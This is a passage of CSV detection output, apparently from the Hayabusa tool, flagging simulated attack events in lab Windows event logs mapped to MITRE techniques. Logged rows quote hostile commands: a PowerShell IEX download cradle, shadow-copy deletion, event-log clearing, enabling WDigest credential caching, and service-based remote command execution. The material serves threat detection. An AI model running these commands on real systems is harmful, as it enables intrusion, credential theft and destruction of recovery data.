| IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.693 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.696 +00:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.908 +00:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.908 +00:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx +2021-12-14 14:42:49.222 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.222 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 14:42:49.255 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.255 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 14:42:49.287 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.306 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.309 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.886 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.889 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.927 +00:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmhorvath | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.937 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.937 +00:00,rootdc1.offsec.lan,4688,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_builtin/proc_creation_win_redirect_to_stream.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.937 +00:00,rootdc1.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.947 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.951 +00:00,rootdc1.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.986 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.989 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.007 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.008 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.008 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.031 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.033 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.046 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.049 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-17 22:44:18.475 +00:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx +2021-12-19 14:33:08.147 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx +2021-12-19 14:48:19.294 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 14:48:21.231 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 14:51:04.020 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 14:51:04.020 +00:00,FS03.offsec.lan,4688,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation_builtin/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 14:51:04.130 +00:00,FS03.offsec.lan,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 14:51:04.130 +00:00,FS03.offsec.lan,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,{$_.Delete();},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.026 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Shadowcopy"" CommandInvocation(ForEach-Object): ""ForEach-Object"" ParameterBinding(ForEach-Object): name=""Process""; value=""$_.Delete();""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.026 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.041 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2022-01-06 22:27:24.156 +00:00,win10-02.offsec.lan,4688,low,Impact,Suspicious Execution of Taskkill,,rules/sigma/process_creation_builtin/proc_creation_win_susp_taskkill.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx +2022-01-07 22:05:06.936 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.640 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.640 +00:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.655 +00:00,FS03.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.655 +00:00,FS03.offsec.lan,4688,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.655 +00:00,FS03.offsec.lan,4688,medium,Disc,Whoami Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-24 17:03:24.224 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.002 +00:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.002 +00:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.004 +00:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.012 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.012 +00:00,fs03vuln.offsec.lan,4688,medium,Evas,Imports Registry Key From a File,,rules/sigma/process_creation_builtin/proc_creation_win_regedit_import_keys.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-26 09:20:49.101 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 09:20:49.101 +00:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 09:20:52.811 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 09:20:52.811 +00:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,rules/sigma/registry_sysmon/registry_set/registry_set_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-02-08 20:33:10.918 +00:00,wef.windomain.local,4697,info,Persis,Service Installed,Name: rdphijack2 | 